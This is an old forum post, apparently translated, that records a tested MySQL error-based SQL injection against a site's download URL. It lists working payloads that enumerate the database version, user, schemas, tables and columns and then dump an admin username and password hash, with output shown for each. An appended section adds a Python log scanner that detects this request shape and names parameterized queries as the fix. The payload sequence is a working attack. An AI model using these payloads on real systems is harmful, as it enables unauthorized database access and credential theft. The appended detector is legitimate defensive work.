php+mysql advanced error-based injection, tested and working

Posted on 2012-9-13 17:52:09
http://www.wooyun.org/bugs/wooyun-2010-01666

I had been looking for something to test this on and did not expect to find it here; it can be used for testing. This is just a record.

http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003

/data0/htdocs/leqi_new/app/myapp.php

or

/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********user()**********/  
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********database()**********/  leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********enumerate the databases one at a time with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
information_schema
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
test

/**********enumerate table names one at a time with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users

/**********enumerate column names one at a time with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
user_id,username,nickname,passwd,group_id
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
11 21
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
11 341 351 361
/**********dump data**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
6a8b4574ca231eb8bd52764d4978ffcd
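A defender-side check for the request shape recorded in this thread, as an added example that is not part of the original post: it decodes each request target from a web access log and flags the `count(*)` / `floor(rand(0)*2)` / `group by` combination that all of the requests above share. The log lines, client addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus
# Constructed access-log lines (not from the original post); addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [13/Sep/2012:17:40:01 +0800] "GET /download/downpage/netarea/id/1600003/wapc/5000_0005_003 HTTP/1.1" 200 512',
    "203.0.113.7 - - [13/Sep/2012:17:41:12 +0800] \"GET /download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003 HTTP/1.1\" 200 734",
    '198.51.100.9 - - [13/Sep/2012:17:42:30 +0800] "GET /news/list?order=rand&group=by-date HTTP/1.1" 200 2048',
]
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Pieces shared by every request in the thread: count(*) grouped on a key built
# from floor(rand(0)*2), which makes MySQL raise a duplicate-key error.
SIGNALS = {
    "floor_rand": re.compile(r"floor\s*\(\s*rand\s*\("),
    "group_by": re.compile(r"\bgroup\s+by\b"),
    "count": re.compile(r"\bcount\s*\("),
    "subselect": re.compile(r"\(\s*select\b"),
}

def normalize(target, max_rounds=3):
    """Decode %XX and '+' repeatedly (catches double encoding), lowercase, collapse spaces."""
    for _ in range(max_rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return re.sub(r"\s+", " ", target.lower())

def classify(target):
    """Return (verdict, sorted matched signal names) for one request target."""
    text = normalize(target)
    hits = sorted(name for name, rx in SIGNALS.items() if rx.search(text))
    if {"floor_rand", "group_by", "count"} <= set(hits):
        return "error-based-sqli", hits
    if "subselect" in hits:
        return "suspicious", hits
    return "clean", hits

def scan(lines):
    """Yield (client_ip, verdict, hits) for every non-clean request in the log."""
    for line in lines:
        m = REQUEST_RE.search(line)
        verdict, hits = classify(m.group(1)) if m else ("clean", [])
        if verdict != "clean":
            yield line.split()[0], verdict, hits

if __name__ == "__main__":
    for ip, verdict, hits in scan(SAMPLE_LOG):
        print(ip, verdict, ",".join(hits))
```

Detection of this kind is a backstop; the flaw itself is closed by binding the `id` path value as a query parameter (or casting it to an integer) instead of concatenating it into the SQL string.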